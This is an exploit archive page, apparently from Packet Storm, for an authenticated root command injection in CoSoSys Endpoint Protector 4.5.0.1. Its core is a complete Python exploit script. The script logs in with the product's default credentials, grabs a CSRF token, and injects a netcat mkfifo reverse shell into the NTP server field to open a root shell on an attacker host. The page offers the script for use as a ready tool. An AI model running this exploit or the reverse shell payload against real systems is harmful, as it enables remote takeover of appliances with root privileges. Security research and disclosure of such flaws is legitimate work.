what you don't know can hurt you

CoSoSys Endpoint Protector 4.5.0.1 Remote Root Command Injection

CoSoSys Endpoint Protector 4.5.0.1 Remote Root Command Injection
Posted Aug 2, 2018
Authored by 0x09AL

CoSoSys Endpoint Protector version 4.5.0.1 suffers from an authenticated remote root command injection vulnerability.

tags | exploit, remote, root
MD5 | 55e44da31aa68dc41af25b68ebbeb0bb

CoSoSys Endpoint Protector 4.5.0.1 Remote Root Command Injection

Change Mirror Download
# Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection
# Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018
# Author : 0x09AL
# Tested on : Endpoint Protector 4.5.0.1
# Software Link : https://www.endpointprotector.com/
# Vulnerable Versions : Endpoint Protector <= 4.5.0.1
# Endpoint Protector suffers from an authenticated command injection vulnerability. By default the username and password are : root:epp2011
# In the Appliance Tab , Server Maintenance the NTP Server field is vulnerable to command injection. There is a call to sh -c {NTP Server field} which is not validated. Attached is the exploit which does this automatically.
# The command may take a while to execute.

import requests
exp = requests.session()
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'


username = 'root'
password = 'epp2011'

host = 'x.x.x.x.x'
rev_host = 'x.x.x.x'
rev_port = '443'

r = exp.post('https://%s/index.php/login' % host,data={'username':username,'password':password,'login':'Login'},verify=False)

shell = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (rev_host,rev_port)

payload = '&& %s' % shell
print payload
if(r.text.find("Welcome Guest")>0):
print "[-] Incorrect credentials [-]"
else:
print "[+] Logged in successfully [+]"
r = exp.get('https://%s/index.php/appliance/maintenance' % host,headers={'X-Requested-With': 'XMLHttpRequest'},verify=False)
if(r.text.find("csrf")>-1):
print "[+] Getting CSRF Token [+]"
csrf_token = r.text.split('value="')[1].split('">')[0]

print "[+] Token: %s [+]" % csrf_token
post_data = {
'csrf_token' : csrf_token,
'continent' :'Europe',
'region' :'Berlin',
'timeSetting[ntpserver]' : payload,
'timeSetting[timesync]' :'12'
}
r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Sending exploit [+]"

if(r.text.find("nc")>-1):
post_data = {
'ntpserver': payload,
'continent' :'Europe',
'region' :'Berlin'
}

r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Exploit success [+]"


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    31 Files
  • 15
    Feb 15th
    10 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close